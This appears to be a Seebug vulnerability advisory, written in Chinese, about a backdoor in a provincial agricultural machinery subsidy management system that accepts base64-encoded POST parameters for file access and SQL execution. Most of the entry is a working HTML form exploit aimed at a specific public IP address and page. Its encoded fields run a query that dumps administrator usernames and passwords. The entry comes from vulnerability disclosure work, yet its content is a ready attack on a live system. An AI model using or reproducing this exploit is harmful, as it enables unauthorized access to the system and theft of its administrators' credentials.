省级农机购置补贴信息管理系统后门

2015-08-28T00:00:00
ID SSV:89262
Type seebug
Reporter Root_C
Modified 2015-08-28T00:00:00

Description

所有参数均使用post方式提交、同时进行base64的加密和解密操作。可直接读写文件、可直接执行sql操作(下面给的例子直接查出管理员用户名密码)。 <pre data-lang="html" class="lang-html"> <p><html></p><p><form action="<a href="http://218.77.183.70/njbt2013/SystemManager/njssqy.aspx" rel="nofollow">http://218.77.183.70/njbt2013/SystemManager/njssqy.aspx</a>" name="test" method="post" enctype="multipart/form-data"></p><p><input type="hidden" name="method" size="23" id="method" value="c3Fs" / sql //></p><p><input type="hidden" name="connstr" size="23" id="method" value="Q09ORklHQ29ubmVjdGlvblN0cmluZw==" / CONFIGConnectionString //></p><p><input type="hidden" name="sqltext" size="23" id="path" value="c2VsZWN0IHVzZXJfY29kZSxwYXNzd29yZCBmcm9tIHRfc3lzdGVtX3p3"  / select user_code,password from t_system_zw //></p><p><input type="submit" value="Submit" /></p><p></form></p><p></html></p> </pre>